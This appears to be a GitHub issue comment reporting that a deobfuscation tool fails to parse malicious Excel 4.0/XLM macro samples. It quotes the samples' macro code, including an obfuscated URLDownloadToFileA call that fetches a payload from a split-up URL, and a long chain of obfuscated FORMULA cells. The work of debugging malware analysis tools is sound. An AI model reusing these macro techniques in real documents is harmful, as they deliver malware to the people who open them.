kirk-sayre-work
commented
2 years ago https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:
- Things like '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http=TEXT(((((((((("s"&":/")&"/m-a")&"in")&"su")&"ra")&"nc")&"e.c")&"o")&"m/w")&"p-a",25352.0)=TEXT((((((((("d"&"m")&"i")&"n/OR")&"iP")&"BS")&"tK")&"NO")&"nI")&"V/",3646.0)","..\udh1.ocx",0,0)' are not parsing because the double quotes in the TEXT() expressions in the "http=..." string are not escaped as '""', so the string is invalid.
- The next problem (I wrote a hacky patch in my local XLMMacroDeobfuscator to get past the 1st problem) is that the TEXT() expressions that appear inside the "http=..." string are not emulated, they just remain as-is in the string. I'm not familiar enough with XLM macros to know whether XLM formula calls are supposed to be resolved inside string literals or not, but it looks like maybe they do get resolved?
Running xlmdeobfuscator on this file: https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1 gives the following error:
Unencrypted xls file
[Loading Cells] auto_open: auto_open->'KBRSBTL'!$J$1 [Starting Deobfuscation] CELL:J12 , FullEvaluation , "False" Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69. Expected one of:
The raw XLM macro, as extracted by olevba, is:
' RAW EXCEL4/XLM MACRO FORMULAS: ' SHEET: KBRSBTL, Macrosheet ' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1